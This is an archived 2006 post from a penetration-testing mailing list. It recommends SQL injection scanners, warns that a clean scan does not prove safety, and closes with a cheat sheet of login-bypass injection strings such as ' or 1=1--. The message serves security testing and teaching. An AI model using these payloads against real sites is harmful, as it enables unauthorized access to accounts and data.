Penetration Testing mailing list archives
Re: Sql injection automated check tool
From: Joseph McCray <joe () learnsecurityonline com>
Date: Sat, 07 Oct 2006 21:11:53 -0400
Hey Juan good to see you bud. Yeah there are a few open source SQL Injection scanners, but a lot of them are blind sql injection scanners (meaning they are basically table name bruteforcers) that you would use after you get the website to generate the sql syntax error. I've found wapiti to be a tool that I like: http://wapiti.sourceforge.net/ There are some simpler scanners that also I like: oedipus <--- Taken offline recently (Google is your friend). simplescanner.pl extendedscanner.pl What seems to much more popular are the slq bruteforcers - man there are tons of them. sqlninja.pl for example can even upload netcat (you gotta love that). The guy who's website I would recommend you check out is Justin Clarke (http://www.justinclarke.com/) and definitely read his EuSecWest Presentation (http://www.justinclarke.com/archives/2006/07/eusecwest_slide.html). Caveat: Just because you run these scanners against a site and they come up clean, DOES NOT mean that the site is not vuln to SQL Injection. These scanners primarily look for SQL errors returned and if the error returned (if there even is one) doesn't fit the regular expression that it's looking for then you'll be off thinking the site is ok when it's not. Custom error pages, and plenty of other things throw these types of scanners of course. This is exactly the discussion I was having with the class that I posted about a few days ago that started all of the email traffic about reporting vulns to companies. If it's a really big site, then I think you should run multiple scanners against the site in question, and manually verify the results. I've had several cases where one tool will report one SQL Injection, and other tools will not. I warn you that they are only a good "STARTING POINT" to a thorough Web App Assessment. Try to change the injections you use in the scanners as well. Here are a few from my cheatsheet: admin:' or a=a-- admin:' or 1=1-- admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a Whew...long email. Hope this helps... Joe On Sat, 2006-10-07 at 09:32 -0700, Juan B wrote:
Hi, Is there a tool to use in pen test to do sql injections? thanks very much ! Juan __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW ------------------------------------------------------------------------
-- Joe McCray Toll Free: 1-866-892-2132 Email: joe () learnsecurityonline com Web: https://www.learnsecurityonline.com Learn Security Online, Inc. * Security Games * Simulators * Challenge Servers * Courses * Hacking Competitions * Hacklab Access
Attachment:
signature.asc
Description: This is a digitally signed message part
Current thread:
- Sql injection automated check tool Juan B (Oct 07)
- Re: Sql injection automated check tool Joseph McCray (Oct 07)
- Re: Sql injection automated check tool Clint P. Garrison, MBA, CISSP (Oct 07)
- Re: Sql injection automated check tool freed0m [hacktimes.com] (Oct 08)
- Re: Sql injection automated check tool Stefano Zanero (Oct 08)
- Re: Sql injection automated check tool ricci (Oct 09)
- Re: Sql injection automated check tool Christian Martorella (Oct 09)
- <Possible follow-ups>
- RE: Sql injection automated check tool Ory Segal (Oct 07)
- Re: Sql injection automated check tool revnic (Oct 09)
- RE: Sql injection automated check tool IT Security (Oct 09)
- RE: Sql injection automated check tool Brass, Phil (ISS Atlanta) (Oct 13)
- Re: RE: Sql injection automated check tool p4ssion (Oct 16)